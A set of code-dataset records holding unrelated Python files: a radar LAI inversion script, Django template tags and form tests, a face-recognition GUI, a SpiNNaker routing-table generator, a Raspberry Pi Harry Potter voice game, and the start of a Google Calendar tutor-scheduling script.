Col10==drybiomass\nvalsm=np.float64(valdm[:,2])#Col5==Soilmoisture\n#valY=np.column_stack((vallai,valsm))\nvalY=vallai\n\n#valX=np.column_stack((valHH,valHV,valVH,valVV))\nvalX=np.column_stack((valVH,valVV))\n\ndf2=vald;\n\n\nnumrows = len(valX) \nlaiout = np.zeros(numrows)\nsmout= np.zeros(numrows)\n\nfor index, row in vald.iterrows():\n #m = 10000\n min = None\n for index1, row1 in Y2.iterrows():\n \n #RMSE\n rmse=np.sqrt((((row[4]-row1[0])**2)+\n ((row[3]-row1[1])**2))/2)\n# \n #L1 estimate\n# rmse = (abs(row[4]-row1[0]) + abs(row[3]-row1[1]))\n \n #Bhattacharya distance\n# rmse = (-np.log(1 + (row[4]*row1[0])**0.5 - 0.5*(row[4] + row1[0]) +\n# (row[3]*row1[1])**0.5 - 0.5*(row[3] + row1[1])))\n \n if laiout[index] == 0 or rmse < min:\n min = rmse\n laiout[index] = row1[3]\n #smout[index] = row1[4]\n \n \n \n#rmse value between datafrmae and list \nvalrmselailut=((vallai - laiout) ** 2).mean() ** .5\nvalrrlailut=np.corrcoef(vallai, laiout) \nmaelai=mean_absolute_error(vallai,laiout)\n\n\n\n#df3 = pd.DataFrame(\n# {'PAIp': laiout\n# })\n##write dataframe to excel\n#writer = pd.ExcelWriter('LUTRetrievedPAIBiom.xlsx', engine='xlsxwriter')\n## Convert the dataframe to an XlsxWriter Excel object.\n#df3.to_excel(writer, sheet_name='Sheet1')\n#\n## Close the Pandas Excel writer and output the Excel 
file.\n#writer.save()\n\n\n\n\n#####Plotting PAI\n#Plotting\nplt.plot(vallai,laiout, 'go')\nplt.xlim([0, 6])\nplt.ylim([0, 6])\nplt.xlabel(\"Observed LAI ($m^2 m^{-2}$)\")\nplt.ylabel(\"Estimated LAI ($m^2 m^{-2}$)\")\nplt.plot([0, 6], [0, 6], 'k:')\nplt.annotate('r = %.2f'%valrrlailut[0,1], xy=(0.5, 5.5))# round off to 2 decimals\nplt.annotate('RMSE = %.2f'%valrmselailut, xy=(0.5, 5.0))\nplt.annotate('MAE = %.2f'%maelai, xy=(0.5, 4.5))\nmatplotlib.rcParams.update({'font.size': 20})\nplt.yticks(np.arange(0, 7, 2))\nplt.xticks(np.arange(0, 7, 2))\nplt.gca().set_aspect('equal', adjustable='box')\n#plt.savefig('PAIValidationLUT.png',bbox_inches=\"tight\",dpi=100)\nplt.show()\n\n","sub_path":"Chapter05/Sec543/Inversion_LUT.py","file_name":"Inversion_LUT.py","file_ext":"py","file_size_in_byte":3998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"456747838","text":"__author__ = 'Onekam'\n\nimport readingData\n\nsong_to_plays = {}\n\n# this will calculate how long a song \"lives\" or is listened to frequently on average\ndef songLifeSpan_total(username):\n global song_to_plays # write to the module-level map that songLifeSpan_individual reads\n song_to_plays = readingData.map_song_to_plays(username)\n\n for key in song_to_plays:\n for key2 in song_to_plays[key]:\n x = songLifeSpan_individual(key, key2)\n\ndef songLifeSpan_individual(artist, song):\n no_plays = len(song_to_plays[artist][song])\n # find oldest and newest plays of song\n # calculate the amount of plays in an n-day period\n # do some stats-y stuff probably\n\n\n","sub_path":"songLifeSpan.py","file_name":"songLifeSpan.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"226004142","text":"from django import template\n# from home.forms import HackathonUserDataForm\nfrom home.models import HomePage\n\n__author__ = 'stefan'\n\nregister = template.Library()\n\n@register.assignment_tag(takes_context=True)\ndef get_template(context, page):\n return page.get_template(context['request'])\n\n@register.assignment_tag(takes_context=True)\ndef filtered_sections(context, slug):\n root = HomePage.objects.get(slug=slug)\n new_list = []\n for s in root.sections:\n new_list.append(s)\n return new_list[1:-1]\n\n\n@register.assignment_tag(takes_context=True)\ndef site_root(context):\n return HomePage.objects.get(slug='home')\n\n# @register.assignment_tag(takes_context=True)\n# def user_form(context):\n# return HackathonUserDataForm()\n\n\ndef icon_title(title):\n title = title.replace('Application Enablement', 'Application
Enablement')\n return title\n\nregister.filter(icon_title)","sub_path":"home/templatetags/hackathon_tags.py","file_name":"hackathon_tags.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"606884925","text":"# Face Recognition system from ( image , video , webcam ) \r\n# face detection using Dlib and classification using Facenet paper implimentation \r\n# our model load pretrained weights (facenet model weights)\r\n\r\nimport sys\r\n# to ignore np and h5 warnings :\r\nif not sys.warnoptions:\r\n import warnings\r\n warnings.simplefilter(\"ignore\")\r\nimport os\r\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\r\n\r\nimport numpy as np\r\nimport tensorflow as tf\r\n# to ignore tensorflow warnings appears in runtime shell :\r\ntf.logging.set_verbosity(tf.logging.ERROR)\r\n\r\nimport tkinter as tk\r\nfrom tkinter import messagebox\r\nfrom tkinter import filedialog\r\nfrom utils.fr_utils import *\r\nfrom model_components.inception_blocks_v2 import *\r\nfrom utils.triplet_loss_fun import *\r\nfrom database.faces_database import *\r\nfrom system_components.recognize_from_image import *\r\nfrom system_components.recognize_from_webcam import *\r\n\r\n# determine the way floating point numbers, arrays and other NumPy objects are displayed to be unique\r\nnp.set_printoptions(threshold=np.nan) \r\n\r\n#tkinter gui to access sysem functionality :\r\ntry:\r\n#while(True):\r\n #main Window\r\n master = tk.Tk()\r\n master.geometry(\"800x400\")\r\n master.title(\"Face Recognition System\")\r\n\r\n\r\n #Loading System Components window function :\r\n def system_loading():\r\n #print(\"initiate model\")\r\n label = tk.Label(master, text=\"Model Initiation\", bg=\"white\", fg=\"green\")\r\n label.pack()\r\n # initiate our model and specifying the input image shape by accessing model_components.inception_blocks_v2 :\r\n FRmodel = faceRecoModel(input_shape=(3, 96, 96))\r\n\r\n # print(\"Total Params:\", FRmodel.count_params())\r\n #print(\"compile model\")\r\n label = tk.Label(master, text=\"Model Compilation\", bg=\"white\", fg=\"black\")\r\n label.pack()\r\n # model configration and specify it's compiling parameters :\r\n FRmodel.compile(optimizer = 'adam', loss = triplet_loss, metrics = ['accuracy'])\r\n\r\n #print(\"weights loading\")\r\n label = tk.Label(master, text=\"Weights Loading\", bg=\"white\", fg=\"red\")\r\n label.pack()\r\n #Facenet weights loading :\r\n load_weights_from_FaceNet(FRmodel)\r\n\r\n #print(\"database loading\")\r\n label = tk.Label(master, text=\"Database Loading\", bg=\"white\", fg=\"blue\")\r\n label.pack()\r\n\r\n #load cropes faces database data from database.txt :\r\n database,load_error = load_database(FRmodel)\r\n if(load_error !=\" \"):\r\n #print(load_error)\r\n #warning message if the database dictionary :\r\n messagebox.showinfo(\"Error\", load_error)\r\n\r\n\r\n label = tk.Label(master, text=\"Please Add Known People To Your System :\", bg=\"green\", fg=\"white\")\r\n label.pack()\r\n\r\n add_known_faces_button = tk.Button(master, text=\"Add Known People\", command=lambda:add_known_faces_window(FRmodel))\r\n add_known_faces_button.pack()\r\n\r\n label = tk.Label(master, text=\"Select your Recognition Input :\", bg=\"green\", fg=\"white\")\r\n label.pack()\r\n\r\n image_recognition_button = tk.Button(master, text=\"Recognize People from Image\", command=lambda:image_recognition_window(FRmodel,database))\r\n image_recognition_button.pack()\r\n cam_recognition_button = 
tk.Button(master, text=\"Recognize People from Live Camera Streaming\", command=lambda:cam_recognition_window(FRmodel,database))\r\n cam_recognition_button.pack()\r\n label = tk.Label(master, text=\"Terminate The System\", bg=\"green\", fg=\"white\")\r\n label.pack()\r\n close_button = tk.Button(master, text=\"Close\", command=quit)\r\n close_button.pack()\r\n\r\n #add_known_faces window function :\r\n def add_known_faces_window(FRmodel):\r\n master2 = tk.Tk()\r\n master2.geometry(\"600x400\")\r\n master2.title(\"Adding Known People\")\r\n\r\n #Selecting known faces images to store the main window\r\n label = tk.Label(master2, text=\"Welcome ..\", bg=\"green\", fg=\"white\")\r\n label.pack()\r\n label = tk.Label(master2, text=\"Click Add Pleople Button Below To Add Images Of Your Known People.\", bg=\"green\", fg=\"white\")\r\n label.pack()\r\n label = tk.Label(master2, text=\"Please Specify The Seected People Names In Each Image File Name.\", bg=\"green\", fg=\"white\")\r\n label.pack()\r\n add_faces_button = tk.Button(master2, text=\"Add Known People\", command=lambda:add_known_faces_fun(FRmodel,master2))\r\n add_faces_button.pack()\r\n\r\n #add_known_faces function :\r\n def add_known_faces_fun(FRmodel,master):\r\n try:\r\n filenames = filedialog.askopenfilenames(initialdir = \"/\",title = \"Select file\",filetypes = ((\"jpg files\",\"*.jpg\"),(\"png files\",\"*.png\"),(\"all files\",\"*.*\")))\r\n if not filenames:\r\n messagebox.showinfo(\"Error\", \"No Image Selected !\")\r\n else:\r\n create_database(FRmodel,filenames,master)\r\n except:\r\n messagebox.showinfo(\"Error\", \"Image Selection Error!\")\r\n\r\n #image regognition window function :\r\n def image_recognition_window(FRmodel,database):\r\n master3 = tk.Tk()\r\n master3.geometry(\"600x400\")\r\n master3.title(\"Image Recognition\")\r\n\r\n\r\n label = tk.Label(master3, text=\"Welcome .. 
Start Recognize People By Image :\", bg=\"green\", fg=\"white\")\r\n label.pack()\r\n label = tk.Label(master3, text=\"Please Select An Image And Then Click The Recognition Button.\", bg=\"green\", fg=\"white\")\r\n label.pack()\r\n\r\n\r\n select_image = tk.Button(master3, text=\"select image\", command=lambda:load_image_fun(FRmodel,database,master3))\r\n select_image.pack()\r\n label = tk.Label(master3, text=\"Terminate Image Recognition\", bg=\"green\", fg=\"white\")\r\n label.pack()\r\n close_button = tk.Button(master3, text=\"Close\", command=master3.destroy)\r\n close_button.pack()\r\n master3.mainloop()\r\n\r\n #load image fun :\r\n def load_image_fun(FRmodel,database,master):\r\n try:\r\n recognition_fraction = 0.59\r\n filename = filedialog.askopenfilename(initialdir = \"/\",title = \"Select file\",filetypes = ((\"jpg files\",\"*.jpg\"),(\"png files\",\"*.png\"),(\"all files\",\"*.*\")))\r\n if not filename:\r\n messagebox.showinfo(\"Error\", \"No Image Selected !\")\r\n else:\r\n #print(filename)\r\n # print(\"recognizing input image\")\r\n # recognize image :\r\n empty_database_loading_error = detect_faces(filename,database , FRmodel,recognition_fraction,master)\r\n # handling the case that the stored known faces database is empty :\r\n if(empty_database_loading_error != \" \"):\r\n messagebox.showinfo(\"Error\", empty_database_loading_error)\r\n except:\r\n messagebox.showinfo(\"Error\", \"Image Selection Error!\")\r\n\r\n #cam streaming regognition window function :\r\n def cam_recognition_window(FRmodel,database):\r\n master4 = tk.Tk()\r\n master4.geometry(\"700x650\")\r\n master4.title(\"Live Camera Streaming Recognition\")\r\n label = tk.Label(master4, text=\"Live Camera Streaming\", bg=\"green\", fg=\"white\")\r\n label.pack()\r\n newwindow = tk.Button(master4, text=\"Start Live Streaming Recognition\", command=lambda:cam_fun(FRmodel,database,master4))\r\n newwindow.pack()\r\n master4.mainloop()\r\n\r\n #determinatin fun :\r\n #def determinate_fun(master,):\r\n\r\n #cam function :\r\n def cam_fun(FRmodel,database,master):\r\n try:\r\n recognition_fraction = 0.59\r\n cam_index = 0\r\n empty_database_loading_error = webcam_detect_faces(database,FRmodel,recognition_fraction,cam_index,master)\r\n # handling the case that the stored known faces database is empty :\r\n if(empty_database_loading_error != \" \"):\r\n #print(empty_database_loading_error )\r\n messagebox.showinfo(\"Error\", empty_database_loading_error)\r\n except:\r\n messagebox.showinfo(\"Error\", \"Camera Error!\")\r\n \r\n #main window components :\r\n\r\n #welcoming label in the main window\r\n label = tk.Label(master, text=\"Please Click The Button Below And Wait To Start Our System.\", bg=\"green\", fg=\"white\")\r\n label.pack()\r\n label = tk.Label(master, text=\"Please Be Patient .. 
It May Take A Bit To Start.\", bg=\"green\", fg=\"white\")\r\n label.pack()\r\n system_loading_button = tk.Button(master, text=\"Start System Componants Loading\", command=system_loading)\r\n system_loading_button.pack()\r\n\r\n master.mainloop()\r\nexcept:\r\n # message box display\r\n messagebox.showinfo(\"Unexpected Error\", \"Something went Wrong ..!\")","sub_path":"FaceRecognition/face_recognition.py","file_name":"face_recognition.py","file_ext":"py","file_size_in_byte":8715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"195176686","text":"from pacman.model.routing_tables.multicast_routing_table import \\\n MulticastRoutingTable\nfrom pacman.model.routing_tables.multicast_routing_tables import \\\n MulticastRoutingTables\nfrom spinn_machine.multicast_routing_entry import MulticastRoutingEntry\nfrom spinn_machine.utilities.progress_bar import ProgressBar\n\n\nclass ICub4ChipReflectorRoutingTableGenerator(object):\n \"\"\" An basic algorithm that can put a hardcoded routing table entry into the\n routers for spinnlink comms\n \"\"\"\n\n def __call__(self):\n\n # progress bar\n progress_bar = ProgressBar(3, \"Generating hardcoded routing tables\")\n\n # container\n routing_tables = MulticastRoutingTables()\n\n # make entries\n multicast_routing_entry_0_0 = \\\n MulticastRoutingEntry(0, 0x00000000, [], [3], False)\n\n multicast_routing_entry_0_1_1_0 = \\\n MulticastRoutingEntry(0, 0x00000000, [], [0], False)\n\n # make routing tables\n chip_0_0_router_table = MulticastRoutingTable(0, 0)\n chip_1_0_router_table = MulticastRoutingTable(1, 0)\n chip_0_1_router_table = MulticastRoutingTable(0, 1)\n\n # add entry to table\n chip_0_0_router_table.add_multicast_routing_entry(\n multicast_routing_entry_0_0)\n progress_bar.update()\n chip_0_1_router_table.add_multicast_routing_entry(\n multicast_routing_entry_0_1_1_0)\n progress_bar.update()\n chip_1_0_router_table.add_multicast_routing_entry(\n multicast_routing_entry_0_1_1_0)\n\n # add to container\n routing_tables.add_routing_table(chip_0_0_router_table)\n routing_tables.add_routing_table(chip_1_0_router_table)\n routing_tables.add_routing_table(chip_0_1_router_table)\n\n progress_bar.end()\n\n # return tables to stack\n return routing_tables\n\n\n\n\n","sub_path":"pf_spinn/reflector/routing_table_generators/icub_4_chip_reflector_routing_table_generator.py","file_name":"icub_4_chip_reflector_routing_table_generator.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"215910142","text":"import enum\nimport os\nimport signal\nimport sys\nimport time\n\nimport digitalio\nimport board\nimport adafruit_rgb_display.st7789 as st7789\nimport busio\nimport subprocess\nimport qwiic_twist\nimport qwiic_button\n\nfrom PIL import Image, ImageDraw, ImageFont\nfrom subprocess import call, Popen\n\nimport RPi.GPIO as GPIO \n\ncwd = os.getcwd()\n\ndef speak(command):\n subprocess.run([\"sh\", \"GoogleTTS_demo.sh\", command])\n # call(f\"espeak -ven -k5 -s150 --stdout '{command}' | aplay\", shell=True)\n time.sleep(0.5)\n\ndef display_image(img):\n display_img = Image.open(f'{cwd}/imgs/{img}')\n display_img = image_formatting(display_img, width, height)\n disp.image(display_img, rotation)\n\ndef get_user_input(correct_answer = 1, should_speak=False, wrong_answer_prompt='Press Ctrl-C to exit. 
Otherwise, try again:'):\n decision = type(correct_answer)(input('Enter your choice: '))\n while decision != correct_answer:\n if should_speak:\n speak(wrong_answer_prompt)\n decision = type(correct_answer)(input(wrong_answer_prompt))\n return decision\n\ndef blink_button(button):\n while not button.is_button_pressed():\n button.LED_on(255)\n time.sleep(0.5)\n button.LED_off()\n time.sleep(0.5)\n button.LED_off()\n\ndef blink_both_buttons():\n while not (redButton.is_button_pressed() or greenButton.is_button_pressed()):\n redButton.LED_on(255); greenButton.LED_on(255)\n time.sleep(0.5)\n redButton.LED_off(); greenButton.LED_off()\n time.sleep(0.5)\n red_pressed = redButton.is_button_pressed()\n redButton.LED_off(); greenButton.LED_off()\n return red_pressed\n\ndef signal_handler(sig, frame):\n print('Closing Gracefully')\n audio_stream.terminate()\n sys.exit(0)\n\n# Configuration for CS and DC pins (these are FeatherWing defaults on M0/M4):\ncs_pin = digitalio.DigitalInOut(board.CE0)\ndc_pin = digitalio.DigitalInOut(board.D25)\nreset_pin = None\n\n# Config for display baudrate (default max is 24mhz):\nBAUDRATE = 64000000\n\n# Setup SPI bus using hardware SPI:\nspi = board.SPI()\n\n# Create the ST7789 display:\ndisp = st7789.ST7789(\n spi,\n cs=cs_pin,\n dc=dc_pin,\n rst=reset_pin,\n baudrate=BAUDRATE,\n width=135,\n height=240,\n x_offset=53,\n y_offset=40,\n)\n\nhardware = 'plughw:2,0'\naudio_stream = Popen(\"/usr/bin/cvlc alsa://\"+hardware+\" --sout='#transcode{vcodec=none,acodec=mp3,ab=256,channels=2,samplerate=44100,scodec=none}:http{mux=mp3,dst=:8080/}' --no-sout-all --sout-keep\", shell=True)\n\n\n# Create blank image for drawing.\n# Make sure to create image with mode 'RGB' for full color.\nheight = disp.width # we swap height/width to rotate it to landscape!\nwidth = disp.height\nimage = Image.new(\"RGB\", (width, height))\nrotation = 90\n\n# Get drawing object to draw on image.\ndraw = ImageDraw.Draw(image)\n\n# Draw some shapes.\n# First define some constants to allow easy resizing of shapes.\npadding = -2\ntop = padding\nbottom = height - padding\n\n# Alternatively load a TTF font. 
Make sure the .ttf font file is in the\n# same directory as the python script!\n# Some other nice fonts to try: http://www.dafont.com/bitmap.php\nfont = ImageFont.truetype(\"/usr/share/fonts/truetype/dejavu/DejaVuSans.ttf\", 18)\n\n# Turn on the backlight\nbacklight = digitalio.DigitalInOut(board.D22)\nbacklight.switch_to_output()\nbacklight.value = True\nbuttonA = digitalio.DigitalInOut(board.D23)\nbuttonB = digitalio.DigitalInOut(board.D24)\nbuttonA.switch_to_input(digitalio.Pull.UP)\nbuttonB.switch_to_input(digitalio.Pull.UP)\n\n# Set up the rotary pin\ntwist = qwiic_twist.QwiicTwist()\ntwist.begin()\ntwist_count = 0\ntwist.set_blue(255)\ntwist.set_red(100)\ntwist.set_green(255)\n\n# Set up buttons\nredButton = qwiic_button.QwiicButton()\nredButton.begin()\n\ngreenButton = qwiic_button.QwiicButton(address=0x62)\ngreenButton.begin()\n\n# Configure screen buttons\nbuttonA = digitalio.DigitalInOut(board.D23)\nbuttonB = digitalio.DigitalInOut(board.D24)\nbuttonA.switch_to_input()\nbuttonB.switch_to_input()\n\ndef image_formatting(image2, width=240, height=135):\n image2 = image2.convert('RGB')\n # Scale the image to the smaller screen dimension\n image2 = image2.resize((width, height), Image.BICUBIC)\n return image2\n\nhouses = ['Gryffinndor', 'Hufflepuff', 'Ravenclaw', 'Slitherin']\nclass Scene(enum.Enum):\n WELCOME = 0\n ARE_YOU_READY = 1\n DIAGON_ALLEY = 2\n BRICK_IMAGE = 3\n OLLIVANDERS = 4\n CHOOSE_WAND = 5\n HOGWARTS_EXPRESS = 6\n BEANS = 7\n SUITCASE = 8\n USE_SPELL = 9\n SORTING_HAT = 10\n CHOOSE_HOUSE = 11\n THANK_YOU = 12\n\nimg_dict = {\n Scene.WELCOME: 'welcome_hogwarts.jpeg',\n Scene.ARE_YOU_READY: 'ready.png',\n Scene.DIAGON_ALLEY: 'diagon-alley.png',\n Scene.BRICK_IMAGE: 'puzzle.png', \n Scene.OLLIVANDERS: 'ollivanders.jpg',\n Scene.CHOOSE_WAND: 'wands.jpeg',\n Scene.HOGWARTS_EXPRESS: 'hogwarts-express.jpg',\n Scene.BEANS: 'beans.png',\n Scene.SUITCASE: 'suitcase.jpg',\n Scene.USE_SPELL: 'open-suitcase.jpg',\n Scene.SORTING_HAT: 'great-hall.jpeg',\n Scene.CHOOSE_HOUSE: 'house-0.png',\n Scene.THANK_YOU: 'thankyou.png'\n}\n\nscreen = Scene.WELCOME\n\ndef callback_fn(channel):\n print(f'Restarting the game:')\nGPIO.add_event_detect(23, GPIO.FALLING, callback=callback_fn, bouncetime=300)\n\nwhile True:\n display_image(img_dict[screen])\n\n if screen == Scene.WELCOME:\n speak(f'We are pleased to inform that you have been admitted to Hogwarts School of Witchcraft and Wizardry!')\n speak(f'Before you join us next week, you are required to complete 5 tasks.')\n next_screen = Scene.ARE_YOU_READY\n\n if screen == Scene.ARE_YOU_READY:\n speak(f'Are you ready? Say YES or NO. Press the red button to repeat.')\n get_user_input()\n next_screen = Scene.DIAGON_ALLEY\n time.sleep(0.1)\n\n if screen == Scene.DIAGON_ALLEY:\n speak(f'Your first task is to enter Diagon Alley')\n next_screen = Scene.BRICK_IMAGE\n\n if screen == Scene.BRICK_IMAGE:\n speak(f\"Tap on the right brick to enter! Here is your clue.\")\n speak(f\"In this world, left means right and up means down!\")\n speak(f\"Start at 3,3. Move one step right, then left-up.\")\n speak(f\"Finally, move left down.\")\n speak(f\"Which brick did you land in?\")\n speak(f\"Press the green button when you ready to answer. Press red to repeat.\")\n\n repeat = blink_both_buttons()\n\n if not repeat:\n decision = int(input('Enter your choice: '))\n if decision != 1:\n speak('Wrong Answer! Think again!')\n speak(f\"Repeating instructions:\")\n else:\n speak(f\"Correct! 
Welcome to Diagon Alley.\")\n next_screen = Scene.OLLIVANDERS\n else:\n speak(f\"Repeating instructions:\")\n time.sleep(0.2)\n\n if screen == Scene.OLLIVANDERS:\n speak(f'Task Number 2')\n speak(f'You definitely need a wand before you are off to learn magic!')\n speak(f'Let us find you one.')\n next_screen = Scene.CHOOSE_WAND\n\n if screen == Scene.CHOOSE_WAND:\n speak(f'Use 3 words to describe yourself!')\n speak(f'This will help Ollivander pick a wand for you.')\n\n speak(f\"Press the green button when you ready to answer, red to repeat.\")\n\n while not (redButton.is_button_pressed() or greenButton.is_button_pressed()):\n redButton.LED_on(255); greenButton.LED_on(255)\n time.sleep(0.5)\n redButton.LED_off(); greenButton.LED_off()\n time.sleep(0.5)\n repeat = redButton.is_button_pressed()\n redButton.LED_off(); greenButton.LED_off()\n\n if not repeat:\n get_user_input()\n time.sleep(0.5)\n speak(f\"Hmm! Wood from Black Walnut and a Core of Dragon Heartstring, that is perfect for you.\")\n next_screen = Scene.HOGWARTS_EXPRESS\n else:\n speak(f\"Repeating instructions:\")\n time.sleep(0.2)\n\n if screen == Scene.HOGWARTS_EXPRESS:\n speak(f'Now that you have your wand, get aboard the Hogwarts Express!')\n speak(f'Enjoy your journey')\n time.sleep(1)\n speak(f'Looks like you are hungry.')\n speak(f'Let us buy Bertie Botts all flavour beans.')\n next_screen = Scene.BEANS\n \n if screen == Scene.BEANS:\n speak(f\"Which flavours do you want?\")\n answer = get_user_input(correct_answer=1, should_speak=True, wrong_answer_prompt='Boring Choice! Try something unique')\n speak(f\"Now, that is an interesting choice!\")\n next_screen = Scene.SUITCASE\n \n if screen == Scene.SUITCASE:\n speak(f'Welcome to Hogwarts!')\n speak(f'Before you proceed to The Great Hall, you need to get dressed.')\n speak(f'But you forgot the keys to your suitcase at home.')\n speak(f'Try to remember and use the spell to open the lock!')\n \n answer = get_user_input(correct_answer=1, should_speak=True, wrong_answer_prompt='Think harder! You can do this.')\n next_screen = Scene.USE_SPELL\n \n if screen == Scene.USE_SPELL:\n speak(f'Good Memory! Now get changed quickly!')\n speak(f'Dinner is about to begin.')\n next_screen = Scene.SORTING_HAT\n \n if screen == Scene.SORTING_HAT:\n speak(f'Welcome to the great hall! Hogwarts has 4 houses.')\n speak(', '.join(houses))\n speak(f'Use the rotating wheel to choose your House.')\n next_screen = Scene.CHOOSE_HOUSE\n \n if screen == Scene.CHOOSE_HOUSE:\n speak(f'Press the wheel to confirm.')\n while not twist.is_pressed():\n choice = twist.count % 4\n display_image(f'house-{choice}.png')\n time.sleep(0.2)\n \n speak(f'What are the 2 colors that represent {houses[choice]}?')\n answer = get_user_input(correct_answer=1, should_speak=True, wrong_answer_prompt='Think harder! 
You can do this.')\n speak(f\"That is the correct answer!\")\n speak(f'You are now part of {houses[choice]}.')\n next_screen = Scene.THANK_YOU\n\n if screen == Scene.THANK_YOU:\n time.sleep(0.5)\n speak(f'Thank you for playing!')\n speak(f'Good luck for your future at Hogwarts.')\n time.sleep(2)\n backlight.value = False\n break\n\n \n time.sleep(0.1)\n screen = next_screen\n\nsignal.signal(signal.SIGINT, signal_handler)\n","sub_path":"Lab 3/harrypotter.py","file_name":"harrypotter.py","file_ext":"py","file_size_in_byte":10363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"142545405","text":"import json\n\nfrom django.test import TestCase\nfrom django.contrib.auth.models import User\nfrom django.urls import reverse\nfrom django.contrib import auth\n\nfrom apps.contacts.tests.helpers import create_user\n\n\nclass LoginFormTest(TestCase):\n def setUp(self) -> None:\n self.credentials = {\n 'username': 'testuser',\n 'password': '12345',\n }\n self.user = User.objects.create(username='testuser')\n self.user.set_password('12345')\n self.user.save()\n\n def test_login_status_code(self):\n \"\"\" test login status \"\"\"\n response = self.client.post(reverse('login'), self.credentials)\n self.assertEqual(response.status_code, 302)\n\n def test_user_is_authenticated(self):\n \"\"\" test user authentication \"\"\"\n self.client.post(reverse('login'), self.credentials)\n user = auth.get_user(self.client)\n assert user.is_authenticated\n\n\nclass SignupFormTest(TestCase):\n def setUp(self) -> None:\n self.credentials = {\n 'username': 'testuser',\n 'email': 'testuser@email.com',\n 'password1': 'HFHFVGHLVFJKHFG',\n 'password2': 'HFHFVGHLVFJKHFG',\n }\n\n def test_signup_status_code(self):\n \"\"\" test signup status \"\"\"\n response = self.client.post(reverse('signup'), self.credentials)\n self.assertEqual(response.status_code, 302)\n\n def test_redirection(self):\n \"\"\" test valid form submission redirects to the login page \"\"\"\n response = self.client.post(reverse('signup'), self.credentials)\n login_url = reverse('login')\n self.assertRedirects(response, login_url)\n\n\nclass EditFormTest(TestCase):\n def setUp(self) -> None:\n self.data = {\n 'name': 'Hello',\n 'last_name': 'World',\n }\n self.user = create_user()\n\n def test_edit_post_status_code_for_valid_request(self):\n \"\"\" test edit post status code for valid post request \"\"\"\n self.client.force_login(self.user)\n response = self.client.post(\n reverse('edit'),\n self.data,\n **{'HTTP_X_REQUESTED_WITH': 'XMLHttpRequest'},\n )\n self.assertEqual(response.status_code, 200)\n\n def test_edit_post_json_for_valid_request(self):\n \"\"\"test edit post's response json for valid post request\"\"\"\n self.client.force_login(self.user)\n response = self.client.post(\n reverse('edit'),\n self.data,\n **{'HTTP_X_REQUESTED_WITH': 'XMLHttpRequest'},\n )\n self.assertEqual(response.json(), {'status': 'updated'})\n\n def test_non_ajax_post_request_status_code(self):\n \"\"\" test non-ajax post request status code \"\"\"\n self.client.force_login(self.user)\n response = self.client.post(reverse('edit'), self.data)\n self.assertEqual(response.status_code, 400)\n\n def test_edit_post_status_code_for_invalid_request(self):\n \"\"\" test edit post status code for invalid post request \"\"\"\n self.client.force_login(self.user)\n self.data['email'] = 'neonwave'\n self.response = self.client.post(\n reverse('edit'),\n self.data,\n **{'HTTP_X_REQUESTED_WITH': 'XMLHttpRequest'},\n )\n 
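# a malformed email must fail form validation and yield HTTP 400\n 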
self.assertEqual(self.response.status_code, 400)\n\n def test_edit_post_json_for_invalid_request(self):\n \"\"\"test edit post's response json for invalid post request\"\"\"\n self.client.force_login(self.user)\n self.data['email'] = 'neonwave'\n self.response = self.client.post(\n reverse('edit'),\n self.data,\n **{'HTTP_X_REQUESTED_WITH': 'XMLHttpRequest'},\n )\n self.assertEqual(json.loads(self.response.content)['status'], 'form_invalid')\n","sub_path":"apps/contacts/tests/test_forms.py","file_name":"test_forms.py","file_ext":"py","file_size_in_byte":3766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"338869906","text":"\nfrom __future__ import print_function\nimport httplib2\nimport os\n\nfrom apiclient import discovery\nfrom oauth2client import client\nfrom oauth2client import tools\nfrom oauth2client.file import Storage\nimport urllib.request\nimport re\n\nimport datetime\nimport pickle\nimport os.path\nfrom collections import defaultdict\nfrom enum import Enum\nimport json\n\nclass TaskInfo(Enum):\n TIMESTAMP = 0\n EMAIL = 1\n TASK = 2\n DATE = 3\n TIME = 4\n RECUR = 5\n\n# constants\nMAX_HOURS = 3\nMAX_TUTORS = 4\n\n# need an index to store from which request to process\nmasterReport = defaultdict(list)\nmasterTasks = list()\n\n# data\nnames = defaultdict() # {email: name}\ntutorHours = defaultdict(lambda:[[] for a in range(10)]) # {name: 0-9 -> list of datetime (\"month-day time\")}\nrestrictedHours = defaultdict(list) # {date: list of times}\nhourCount = defaultdict(int) # {datetime: count}\n\n# text files\nFILE_NAMES = \"8B_Names.json\"\nFILE_RESTRICT = \"8B_restricted_hours.json\"\nFILE_REQUEST = \"8B_requests.txt\"\n\ntry:\n import argparse\n flags = argparse.ArgumentParser(parents=[tools.argparser]).parse_args()\nexcept ImportError:\n flags = None\n\n# If modifying these scopes, delete your previously saved credentials\n# at ~/.credentials/calendar-python-quickstart.json\nSCOPES = 'https://www.googleapis.com/auth/calendar'\nCLIENT_SECRET_FILE = 'client_secret.json'\nAPPLICATION_NAME = 'Google Calendar'\n\n# calendar details\n# 8A Spring 2018 Calendar ID\nCAL_ID = 'eng.ucsd.edu_cprroni4e75jsicjt9bv26nm74@group.calendar.google.com'\nTIME_FROM = '2018-04-02T00:00:00-07:00'\nTIME_TO = '2018-06-08T23:59:59-07:00'\nLAST_DATE = '6/8/2018'\nLAST_HOUR = '21:00:00'\n\n# constant strings\nADD_DECLINE = 'Decline to add hour to calendar'\nREMOVE_DECLINE = 'Decline to remove hour from calendar'\n\ndef myPrint(data):\n for line in data:\n print(line)\n\ndef printTutorHours():\n\n\tglobal tutorHours\n\t\n\t# print tutor hours count\n\tfor tutor, weeks in tutorHours.items():\n\t\tprint(\"%s:\" % tutor)\n\t\tfor i in range(1, len(weeks)+1):\n\t\t\tprint(\"\\tWeek %s: %s\" % (i, weeks[i-1]))\n\ndef printError(message, name, time):\n print(message + \": \" + name + \" (\" + str(time) + \")\")\n\ndef convertToDatetime(date, time):\n '''Convert a date (month/day/year) and a time (hr:min:sec) into 